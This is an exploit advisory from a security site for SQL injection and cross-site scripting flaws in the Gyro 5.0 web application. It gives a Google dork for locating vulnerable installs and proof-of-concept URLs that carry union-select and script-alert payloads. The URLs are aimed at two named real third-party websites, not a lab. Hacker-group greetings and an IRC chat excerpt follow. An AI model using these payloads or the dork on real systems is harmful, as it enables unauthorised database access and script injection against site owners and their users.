Gyro 5.0 (SQL/XSS) Multiple Remote Vulnerabilities

2009-09-24 / 2009-09-25
Credit: OoN_Boy
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79
CWE-89

[+]=================================================================[+] ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ||A |||n |||t |||i |||S |||c |||e |||r |||u |||t |||i |||y || ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| ------------------------------------------------------------ http://antisecurity.org [+]=================================================================[+] [x]Title : Gyro V5.0 [Sql/Xss] Multiple Remote Vulnerabilities [x]Software : Gyro V5.0 [x]Vendor : http://www.datavore.com [x]Date : 11 September 2009 ( Indonesia ) [x]Author : OoN_Boy [x]Contact : oon.boy9@gmail.com [x]Blog : http://oonboy.blogspot.com [x]Website : http://oonboy.info [+]=================================================================[+] [x] Google Dork "powered by Gyro V5.0" [+]=================================================================[+] [x] Exploit http://localhost/home?op=cat&cid=[sql] http://localhost/home?op=cat&cid=[Xss] [x] Proof of concept http://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14-- http://www.vansda.ca/home?op=cat&cid=29"><script>alert(123456)</script> http://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14-- http://www.phpmath.com/home?op=cat&cid=29"><script>alert(123456)</script> [+]=================================================================[+] [x] Greetz Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com www.ServerIsDown.org - Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^ [+]=================================================================[+] [x] Wew [03:49] <&OoN_Boy> ============================ [03:49] <&OoN_Boy> [03:48] <&chawanua> mentang2 dah jadian ama si noge .. [03:49] <&OoN_Boy> [03:48] <&Jack> xixixi [03:49] <&OoN_Boy> [03:48] <&Jack> maap maap [03:49] <&OoN_Boy> [03:48] <&Jack> :D [03:49] <&OoN_Boy> [03:48] <&chawanua> si bob ko tinggalin [03:49] <&OoN_Boy> [03:49] <&Jack> aq homo, begitu jg dirimu [03:49] <&OoN_Boy> ============================ [+]=================================================================[+] ---------===Jangan Ngambek Jack ===---------

References:

http://xforce.iss.net/xforce/xfdb/53194
http://www.milw0rm.com/exploits/9640


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top